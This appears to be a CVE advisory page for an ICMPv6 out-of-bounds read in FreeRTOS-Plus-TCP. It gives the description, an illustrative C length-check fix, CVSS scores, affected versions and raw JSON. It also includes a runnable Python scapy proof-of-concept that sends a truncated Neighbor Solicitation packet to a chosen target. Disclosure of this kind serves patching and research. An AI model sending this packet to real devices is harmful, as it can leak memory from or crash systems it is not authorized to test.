Security Vulnerability Report
CVE-2025-11616 CVSS 5.4 MEDIUM

CVE-2025-11616

Published: 2025-10-10 18:15:38
Last Modified: 2025-10-31 18:23:00
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

A missing validation check in FreeRTOS-Plus-TCP's ICMPv6 packet processing code can lead to an out-of-bounds read when receiving ICMPv6 packets of certain message types which are smaller than the expected size. These issues only affect applications using IPv6. Users should upgrade to the latest version and ensure any forked or derivative code is patched to incorporate the new fixes.
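The kind of check the description says was missing, shown as an added example (not FreeRTOS-Plus-TCP source and not from the vendor advisory): compare the received length against the per-type minimum before touching type-specific fields. Function names and the sample buffer are hypothetical; the minimum sizes are those of RFC 4443 and RFC 4861.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Illustrative only: hypothetical names, not FreeRTOS-Plus-TCP code. */
#define ICMP6_HDR_LEN 4u /* type, code, checksum */

/* Constructed sample: well-formed 24-byte Neighbor Solicitation, target ::1. */
static const uint8_t sample_ns[24] = { 135, 0, 0, 0, [23] = 1 };

/* Smallest well-formed message for each type (RFC 4443 / RFC 4861). */
size_t icmp6_min_len(uint8_t type)
{
    switch (type) {
    case 128: /* Echo Request */
    case 129: /* Echo Reply */
    case 133: /* Router Solicitation */
        return 8u;
    case 134: /* Router Advertisement */
        return 16u;
    case 135: /* Neighbor Solicitation */
    case 136: /* Neighbor Advertisement */
        return 24u; /* 4 header + 4 reserved/flags + 16 target address */
    default:
        return ICMP6_HDR_LEN;
    }
}

/* Copies the NS/NA target address out of msg. Returns 1 on success and
 * 0 (drop the packet) when the message is shorter than its type requires. */
int icmp6_get_target(const uint8_t *msg, size_t len, uint8_t target[16])
{
    if (msg == NULL || len < ICMP6_HDR_LEN)
        return 0; /* not even a complete ICMPv6 header */
    if (msg[0] != 135 && msg[0] != 136)
        return 0; /* this helper only handles NS/NA */
    if (len < icmp6_min_len(msg[0]))
        return 0; /* truncated: bytes 8..23 would be read out of bounds */
    memcpy(target, msg + 8, 16);
    return 1;
}

int main(void)
{
    uint8_t target[16];
    /* The full message is accepted; the same bytes cut to 4 are dropped. */
    return !(icmp6_get_target(sample_ns, sizeof sample_ns, target) == 1 &&
             icmp6_get_target(sample_ns, 4, target) == 0);
}
```

The length passed in must be the number of bytes actually received for the ICMPv6 message, not a length field taken from the packet.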

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:amazon:freertos-plus-tcp:*:*:*:*:*:*:*:* - VULNERABLE
FreeRTOS-Plus-TCP < V4.3.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11616 - FreeRTOS-Plus-TCP ICMPv6 OOB Read PoC
# This PoC demonstrates crafting a malformed ICMPv6 packet
# that triggers an out-of-bounds read in FreeRTOS-Plus-TCP
from scapy.all import IPv6, ICMPv6EchoRequest, Raw, send, conf

# Disable verbose output
conf.verb = 0


def craft_malformed_icmpv6(target_ip, src_ip="fe80::1"):
    """
    Craft a malformed ICMPv6 packet with insufficient length
    to trigger OOB read in FreeRTOS-Plus-TCP's ICMPv6 processing code.

    The vulnerability is triggered when an ICMPv6 packet has a valid
    message type but a payload smaller than the expected minimum size
    for that message type.
    """
    # Create a minimal ICMPv6 Echo Request with truncated payload
    # Normal ICMPv6 Echo Request requires at least 8 bytes header
    # We craft a packet with type indicating a larger expected structure
    # but with insufficient actual data length

    # ICMPv6 Type 128 = Echo Request (requires 8 bytes header + variable data)
    # We send a packet that claims to be a larger ICMPv6 type
    # but with truncated payload

    # Build the malformed packet manually
    # Type: 135 (Neighbor Solicitation) - normally requires 24+ bytes
    # But we provide only minimal data to trigger OOB read
    malformed_type = 135  # Neighbor Solicitation
    malformed_code = 0

    # Create raw ICMPv6 with truncated data
    # Only provide 4 bytes instead of expected minimum
    raw_icmpv6 = bytes([malformed_type, malformed_code, 0x00, 0x00])

    # Construct IPv6 packet with the malformed ICMPv6 payload
    packet = IPv6(src=src_ip, dst=target_ip) / Raw(load=raw_icmpv6)
    return packet


def exploit(target_ip):
    """Send the malformed ICMPv6 packet to trigger the vulnerability"""
    pkt = craft_malformed_icmpv6(target_ip)
    print(f"[*] Sending malformed ICMPv6 packet to {target_ip}")
    print(f"[*] Packet type: Neighbor Solicitation (135)")
    print(f"[*] Payload size: 4 bytes (expected: 24+ bytes)")
    send(pkt)
    print("[+] Packet sent successfully")


if __name__ == "__main__":
    import sys

    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_ipv6_address>")
        sys.exit(1)
    target = sys.argv[1]
    exploit(target)
```

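References

https://aws.amazon.com/security/security-bulletins/AWS-2025-023/ (Vendor Advisory)
https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/releases/tag/V4.3.4 (Release Notes)
https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/security/advisories/GHSA-8j9h-xjm9-8j6j (Vendor Advisory)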

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11616", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-10-10T18:15:38.080", "lastModified": "2025-10-31T18:22:59.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing validation check in FreeRTOS-Plus-TCP's ICMPv6 packet processing code can lead to an out-of-bounds read when receiving ICMPv6 packets of certain message types which are smaller than the expected size. These issues only affect applications using IPv6.\n\nUsers should upgrade to the latest version and ensure any forked or derivative code is patched to incorporate the new fixes."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amazon:freertos-plus-tcp:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.3.4", "matchCriteriaId": "89B35827-054F-4712-A2AB-FB26C87C9C56"}]}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-023/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/releases/tag/V4.3.4", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Release Notes"]}, {"url": "https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/security/advisories/GHSA-8j9h-xjm9-8j6j", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}]}}